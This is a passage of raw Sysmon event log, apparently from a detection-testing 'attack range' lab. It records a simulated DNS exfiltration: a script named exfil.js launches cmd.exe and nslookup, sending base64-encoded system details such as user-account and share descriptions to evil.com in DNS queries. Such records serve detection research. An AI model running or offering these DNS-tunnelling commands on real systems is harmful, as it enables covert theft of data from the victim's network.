32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202292Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.480{2E1864BB-17C6-629A-3D41-000000005F02}5104C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyevld.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000202291Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.469{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlmogtds.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000202290Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.452{2E1864BB-17C6-629A-3B41-000000005F02}79082380C:\Windows\system32\conhost.exe{2E1864BB-17C6-629A-3C41-000000005F02}7464C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202289Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.436{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202288Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.436{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202287Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.436{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202286Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.436{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202285Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.436{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-3C41-000000005F02}7464C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202284Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.436{2E1864BB-17C6-629A-3A41-000000005F02}6527784C:\Windows\system32\cmd.exe{2E1864BB-17C6-629A-3C41-000000005F02}7464C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202283Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.450{2E1864BB-17C6-629A-3C41-000000005F02}7464C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C6-629A-3A41-000000005F02}652C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmogtds.tmp 2>&1 10341000x8000000000000000202282Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.415{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C6-629A-3B41-000000005F02}7908C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202281Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.415{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C6-629A-3B41-000000005F02}7908C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202280Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.415{2E1864BB-17C6-629A-3B41-000000005F02}79082380C:\Windows\system32\conhost.exe{2E1864BB-17C6-629A-3A41-000000005F02}652C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202279Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.399{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-3B41-000000005F02}7908C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202278Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.399{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202277Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.399{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202276Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.399{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202275Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.399{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202274Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.399{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-3A41-000000005F02}652C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202273Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.399{2E1864BB-17A1-629A-783D-000000005F02}55526064C:\Windows\System32\WScript.exe{2E1864BB-17C6-629A-3A41-000000005F02}652C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202272Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.402{2E1864BB-17C6-629A-3A41-000000005F02}652C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmogtds.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000202271Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.383{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nliho.tmpMD5=D9DF221F6D351CB50A3CBB01BFD8B97F,SHA256=8D9029C9E209585AD6E7701BC4A411971A01D3D7E0C67FCA5DA104D2C7FD6185,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000202270Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.368{2E1864BB-17C6-629A-3841-000000005F02}78883336C:\Windows\system32\conhost.exe{2E1864BB-17C6-629A-3941-000000005F02}7804C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202269Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.368{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202268Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.368{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202267Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.368{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202266Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.368{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202265Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.368{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-3941-000000005F02}7804C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202264Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.368{2E1864BB-17C6-629A-3741-000000005F02}7444508C:\Windows\system32\cmd.exe{2E1864BB-17C6-629A-3941-000000005F02}7804C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202263Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.369{2E1864BB-17C6-629A-3941-000000005F02}7804C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C6-629A-3741-000000005F02}7444C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nliho.tmp 2>&1 10341000x8000000000000000202262Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.352{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C6-629A-3841-000000005F02}7888C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202261Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 